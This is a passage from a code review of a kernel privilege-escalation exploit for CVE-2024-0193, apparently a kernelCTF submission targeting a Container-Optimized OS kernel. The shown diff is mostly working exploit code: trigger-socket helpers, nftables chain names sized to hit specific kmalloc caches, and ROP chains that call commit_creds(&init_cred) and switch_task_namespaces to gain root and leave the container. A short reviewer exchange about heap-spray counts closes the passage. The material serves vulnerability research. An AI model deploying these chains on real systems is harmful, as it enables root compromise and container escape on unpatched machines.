pocs/linux/kernelctf/CVE-2024-0193_cos/exploit/cos-105-17412.226.52/exploit.c

```diff
@@ -0,0 +1,864 @@
+		printf("[-] Connection with server failed");
+
+	write(sockfd, "AAAA", 4);
+
+	close(sockfd);
+
+	return;
+}
+
+/* Set up a server to receive hook-triggering output packets */
+void setup_trig_server(void) {
+	int sfd = 0, sock = 0;
+	struct sockaddr_in address;
+	int opt = 1;
+	int addrlen = sizeof(address);
+	char buffer[1024] = { 0 };
+
+	if((sfd = socket(AF_INET, SOCK_STREAM, 0)) == 0)
+		printf("[-] Error at socket()");
+
+	if(setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR | SO_REUSEPORT, &opt, sizeof(opt)))
+		printf("[-] Error at setsockopt()");
+
+	address.sin_family = AF_INET;
+	address.sin_addr.s_addr = INADDR_ANY;
+	address.sin_port = htons(TRIG_PORT);
+
+	if(bind(sfd, (struct sockaddr*)&address,  sizeof(address)) < 0)
+		printf("[-] Error at bind()");
+
+	if(listen(sfd, 3) < 0)
+		printf("[-] Error at listen()");
+
+	if((sock = accept(sfd, (struct sockaddr*)&address, (socklen_t*)&addrlen)) < 0)
+		printf("[-] Error at accept()");
+
+	read(sock, buffer, 4);
+
+	sleep(3);
+
+	close(sock);
+	close(sfd);
+
+	return;
+}
+
+char * table1_name = "table1";
+
+char * set1_name = "set1";
+char * set2_name = "set2";
+
+char * chain1_name = "chain1";
+char * chain2_name = "chain2";
+// allocate chain->name to kmalloc-cg-16
+char * chain3_name = "chain3_123412341234";
+// allocate chain->name to kmalloc-cg-192
+char * chain4_name = "chain4_1234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234";
+
+uint8_t family = NFPROTO_IPV4;
+uint32_t set_id = 1337;
+
+void make_payload2(uint64_t* data){
+    int i = 0;
+
+    // find_task_by_vpid(1)
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = 1;
+    data[i++] = kbase + find_task_by_vpid_off;
+
+    // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
+    data[i++] = kbase + mov_rdi_rax_ret;
+    data[i++] = 0;
+
+    data[i++] = kbase + pop_rsi_ret;
+    data[i++] = kbase + init_nsproxy_off;
+    data[i++] = kbase + switch_task_namespaces_off;
+
+    data[i++] = kbase + swapgs_restore_regs_and_return_to_usermode_off;
+    data[i++] = 0;                  // rax
+    data[i++] = 0;                  // rdx
+    data[i++] = _user_rip;          // user_rip
+    data[i++] = _user_cs;           // user_cs
+    data[i++] = _user_rflags;       // user_rflags
+    data[i++] = _user_sp;           // user_sp
+    data[i++] = _user_ss;           // user_ss
+}
+
+void make_payload(uint64_t* data){
+    int i = 0;
+
+    data[i++] = kbase + push_rbx_pop_rsp;
+    data[i++] = kbase + pop_r12_pop_r13_ret;
+    data[i++] = 0xffff | ((unsigned long) 0x8 << 44);
+    data[i++] = heap_addr2;
+
+    // commit_creds(&init_cred)
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = kbase + init_cred_off;
+    data[i++] = kbase + commit_creds_off;
+
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = 0;
+
+    data[i++] = kbase + pop_rsp_ret;
+    data[i++] = heap_addr1+0x20;
+}
+
+#define TABLE_SPRAY 0x200
```

Comment:
Looks like the number of objects being sprayed increased compared to the previous exploits. Was this for optimization or a different reason?

Reply:
Due to the different target kernel versions, I used different number of spray for optimization.